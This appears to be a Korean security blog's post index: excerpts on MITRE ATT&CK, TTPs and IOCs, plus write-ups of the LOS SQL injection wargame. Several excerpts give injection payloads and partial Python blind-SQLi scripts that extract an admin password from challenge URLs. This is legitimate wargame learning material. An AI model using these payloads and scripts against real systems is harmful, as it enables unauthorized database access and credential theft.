agencies

MITRE ATT&CK 프레임워크의 이해 1958년에 설립된 미국의 비영리 민간 연구 기관 - 미국의 정부 기관과 협력하여 국방, 보안, 헬스케어 등의 분야에서 전문적인 연구를 수행 대표적인 프로젝트 : CVE / CWE / CAPEC / STIX / TAXII / MAEC / ATT&CK / D3FEND - CVE - 과거에는 서로 취약점마다 부르는 내용이 달랐다. (의사소통 부재) CVE 프로젝트를 통해 이름을 붙일 가치가 있는 익스플로잇에게 공식적인 이름을 만들게 되었다. - CWE - 잘 알려진 여러가지 공격 기술들을 수집하고 분류함 - CAPEC - 공격자들의 행위를 분류한 것 많은 업체들이 인텔리전스를 생성하고 있는데 서로 인텔리전스와 관련된 정보를 통일하자! - STIX - 위협 정보를 표현..

TTPs (Tactics, Techniques, Procedures) TTPs 개요 TTP는 위협 행위를 체계적으로 설명하기 위한 일종의 모델을 의미합니다. tactics (전술)은 위협 행위의 목적을 나타냄 techniques (테크닉)은 위협 행위의 목적을 달성하기 위해 사용되는 테크닉을 의미함 procedures (프로시저)는 테크닉을 구현하기 위한 구체적인 절차와 방법을 의미함 전술 테크닉/서브테크닉 프로시저 최초 접근 (공격자가 내부망에 침투해서 교두보를 확보하기 위해) 스피어 피싱 / 첨부파일을 이용한 스피어 피싱 악성고스트스크립트가 포함된 hwp 파일을 이메일에 첨부 사용자가 첨부된 hwp 파일을 오픈하면 mshta.exe가 실행되어 외부에서 세컨 스테이지 악성 스크립트를 다운로드 받아 실행..

IOC (Indicator of compromise 침해지표) 시스템이 악의적인 활동에 의해 침해되었을 가능성이 높음을 보여주는 운영체제 또는 네트워크 아티팩트 IOC로 주로 사용되는 정보 : 해시값, 파일이름및경로, C2도메인, IP주소, URI, 레지스트리키, 서비스이름, 정보, 스케쥴된태스크정보 (등) 특정 위협이나 공격이 발생했는지를 판단하기 위한 시그니처로 인식되고 활용되어 왔음 최근에는 잠재적인 위협을 탐지하기 위한 보편적 이상 행위를 포함하는 개념으로 확장되고 있음 (예시) 파일에 대해 연속적으로 접근을 하면 공격으로 판단한다.. => 행위기반 탐 IOC 기반 탐지의 한계점 - reactive 하다. (발생되지 않은 공격에 대한 시그니처를 만들 수 없다) - 유효 기간이 짧다 (10년전 공격..

MITRE ATT&CK 프레임워크 이해 mitre att&ck은 2013년도에 등장 + (EDR) 2018년도 이후 관심을 받게 됨 mitre att&ck이 관심을 받게 된 이유는? - 사전에 위협을 식별하고 이를 제거하기 위해 - 제거되지 못한 위협에 대한 리스크는 접근 통제 등의 보안 매커니즘을 활용하여 제어 - 차단 및 보호 중심의 보안 기술 및 정책은 여전히 중요하지만 그것만으로는 직면한 모든 위협에 완벽하게 대응하기 어려움 > 차단과 보호에 상당한 자원을 투입하고 노력을 기울였음에도 침해사고를 경험하게 된 많은 사례들이 존재 > 차단 및 보호 매커니즘은 상당수가 reactive 한 속성을 지님 > 비즈니스 목적 상 외부와의 접점을 더 이상 제한하기가 어려움 > 차단 및 보호 매커니즘을 우회하여 ..

타자연습 게임 화면 배열 슈팅게임 화면 ※ 재미있게 플래이를 해 주신 현수(샌즈)님 감사합니다.

이번시간에는 지금까지 발생했던 문제들을 해결하는 내용을 가지고 있습니다. 1. 네트워크 연결이 되지 않음 가상머신에서 장치 > 네트워크 > 네트워크 설정을 클릭합니다. 케이블 연결됨 부분에 체크가 되어 있지 않아 3시간 이상을 삽질했었습니다... 2. mysql 한글 출력 패스워드를 한글로 설정하는 문제를 제작하고 있었습니다. update user_table set pass='방첩사령부' where user='dcc'; 의 쿼리문으로 깨진 한글을 수정하였습니다. 추가로 alert table user_table convert to character set utf8mb4;도 했습니다. 3. mysql 한글 출력(2) 분명 패스워드가 나와야 하는데... 깨져서 나오는 것 같습니다. mysql 접속을 하는 부분..

SQL Injection for Expert 목차 * 이 문서는 어떻게 작성되었는가? * SQL Injection Filter Bypass * , Array 변수를 사용한 SQL Injection * Error Based SQL Injection * Error Based Blind SQL Injection * Indirect SQL Injection * Efficient Blind SQL Injection * SQL Injection with information schema.processlist [*] 이 문서는 어떻게 작성되었는가? LeaveRet 소속의 rubiya 가 심화된 SQL injection 기법을 익히기를 희망하는 해커, 개발자들을 위해서 작성했다. 이 문서는 PHP, Mysql 환경에서..

지금까지 보았던 pw = 형식과 다르게 like를 사용하는 모습을 볼 수 있었습니다. 검색을 해보니... like를 통해 와일드카드를 사용할 수 있다고 합니다. 이를 통해 패스워드의 길이와 값을 알아낼 수 있다고 합니다. _를 8번 입력하니 Hello guest가 나타났습니다. 앞에 9를 입력하고 나머지는 글자수만큼 _로 채워줬습니다. 패스워드가 8자리만 나타나야하는데 계속 파이썬 스크립트 코드가 돌아가는 모습을 볼 수 있었습니다. * flag 변수 한개만 있었네요.. 스크립트의 잘못된 부분을 찾아보기 위해 하나씩 대입하던 중 902_____를 입력했더니 문제를 풀었다고 합니다. guest는 패스워드가 나타났으나... admin 같은 경우 아래의 사진처럼 guest의 패스워드가 중복이 되어 패스워드가 나..

LOS의 문제 내용입니다. darkknight 이며, 문제풀이 내용은 아래와 같습니다. import requests as r url = "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?no=1%20or%20id%20like%20reverse(%22nimda%22)%20and%20" i=8 flag = "" #패스워드 검사 for j in range(1,i+1): for k in range(ord('0'), ord('z')): p = "ord(mid(pw,{0},1))like {1}%23".format(j,k) res = r.get(url+p,cookies={"PHPSESSID":"vgjb9eaaankiq042bvju..

이번에는 or과 and만 주의해서 문제를 풀면 될 것 같습니다. 패스워드의 길이는 8정도로 예상하고 값을 입력합니다. pw='||id='admin'%26%26length(pw)=8%23 %26은 &을 나타냅니다. 따라서 &&은 and 연산과 동일합니다. ||은 or과 동일합니다. %23은 #으로 sql에서는 뒷 부분이 모두 주석처리되는 기능을 가지고 있습니다. 이제 패스워드의 길이를 구했으니, 값을 구할 차례입니다. import requests as r url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27||id=%27admin%27%26%26" i=8 flag = "" #패스워드 검사 for j in ran..

rubiya 멘토님께서 화이팅이라고 말씀하셔서... 프로젝트로 LOS 따라하기를 진행하고자 합니다. 홈페이지 프로젝트는 ... 대ㄱ 1. 가상머신 우분투 구축 2. apache / php / sql 설치 및 연동 3. LOS 문제풀이 및 동일한 내용으로 구축하기 https://los.rubiya.kr/gate.php https://los.rubiya.kr/gate.php los.rubiya.kr 위 사이트는 진품 LOS 사이트입니다. 위 사이트는 가품 LOS 사이트입니다. SQL-4 를 확인해보겠습니다. 문제 페이지 이미지 실제 서버 이미지 이런 .. 테이블을 분리하지 않았더니 기존에 있던 admin과 섞이게 되었습니다 ㅠㅠ user 이름을 수정해야겠습니다. ( newadmin으로 수정했습니다.) imp..